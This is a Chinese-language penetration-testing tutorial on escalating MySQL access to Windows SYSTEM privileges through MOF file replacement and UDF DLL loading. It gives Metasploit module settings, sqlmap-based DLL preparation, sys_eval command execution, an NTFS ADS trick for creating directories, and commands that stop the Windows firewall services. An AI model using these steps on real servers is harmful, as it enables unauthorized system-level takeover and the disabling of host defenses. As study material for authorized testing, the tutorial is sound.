MySQL-UDF和MOF提权

MOF提权

MOF文件是mysql数据库的扩展文件（在c:/windows/system32/wbem/mof/nullevt.mof）

叫做”托管对象格式”，其作用是每隔五秒就会去监控进程创建和死亡

MOF提权原理

MOF文件既然每五秒就会执行，而且是系统权限，我们通过mysql将文件写入一个MOF文件替换掉原有的MOF文件，然后系统每隔五秒就会执行一次我们上传的MOF。MOF当中有一段是vbs脚本，我们可以通过控制这段vbs脚本的内容让系统执行命令，进行提权。

利用条件

Windows<=2003

mysql在c:windows/system32/mof目录有写权限

已知数据库账号密码

这个提权方式条件非常严苛，数据库在system32写文件这个条件一般很难达到。

而且较新的系统无法使用MOF提权

技巧：

要是能够通过网页连接管理（phpmyadmin），则可以修改host为“%”并刷新权限后，则可以通过msf等工具远程连接数据库。

默认root等账号不允许远程连接，除非管理员或者数据库用户自己设置

Msf直接mof提权

Msf 下有Mof 提权模块 ，不过该漏洞成功跟操作系统权限和Mysql数据库版本有关

执行成功后会直接反弹 shell 到 meterpreter

use exploit/windows/mysql/mysql_mofsetrhost 192.168.157.1  #设置需要提权的远程主机IP地址setrport 3306           #设置mysql的远程端口setpasswordroot         #设置mysql数据库root密码setusername root        #设置mysql用户名options #查看设置run 0 

UDF提权

UDF(user-defined function)是MySQL的一个拓展接口，也可称之为用户自定义函数

用户可以通过自己增加函数对mysql功能进行扩充，文件后缀为.dll

提权原理

利用root权限，创建带有调用cmd函数的’udf.dll’(动态链接库)

当我们把’udf.dll’导出指定文件夹引入Mysql时，其中的调用函数拿出来当作mysql的函数使用。

这样我们自定义的函数才被当作本机函数执行。

在使用CREAT FUNCITON调用dll中的函数后，mysql账号转化为system权限，从而提权

利用条件

windows2003、windowsXP、windows7

已知mysql中root的账号密码

拥有mysql的insert和delete权限

mysql版本 < 5.2 , UDF导出到系统目录c:/windows/system32/

mysql版本 > 5.2 ，UDF导出到安装路径MySQL\Lib\Plugin\

可以直接查询插件安装目录：

show variables like %plugin%​

上传udf.php到网站中

在udf.php中将udf.dll导出到插件目录，udf.dll可以用sqlmap生成

1.首先进入到 sqlmap\extra\cloak\cloak 目录下

2.打开命令终端，执行命令：python cloak.py -d -i \sqlmap目录\udf\mysql\windows\32\lib_mysqludf_sys.dll_

3.将生成的lib_mysqludf_sys.dll改名为udf.dll上传到目标数据库

4.创建相应函数：create function sys_eval returns string soname 'udf.dll';

5.执行命令：select sys_eval(‘whoami’);

6.删除函数：drop function sys_eval;

在将udf.dll文件导出到lib\plugin目录下时，如果plugin不存在，可以用NTFS ADS流来创建文件夹并导入dll

select @@basedir;   //查找到mysql的目录select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';   //利用NTFS ADS创建lib目录select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';//利用NTFS ADS创建plugin目录​

连不上3389可以先停止windows防火墙和筛选

 select sys_eval(‘net stop policyagent’); select sys_eval(‘net stop sharedaccess’);​

函数说明：函数说明：

sys_eval，执行任意命令，并将输出返回。

sys_exec，执行任意命令，并将退出码返回。

sys_get，获取一个环境变量。

sys_set，创建或修改一个环境变量。

END

一个MySQL自动化提权工具：Github链接

Refers

mysql数据库提权总结

https://uuzdaisuki.com/2018/07/02/mysql%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/

Mysql udf提权(Linux平台)

http://vinc.top/2017/04/19/mysql-udf%E6%8F%90%E6%9D%83linux%E5%B9%B3%E5%8F%B0/

那些提权测试中的奇淫技巧

https://paper.seebug.org/32/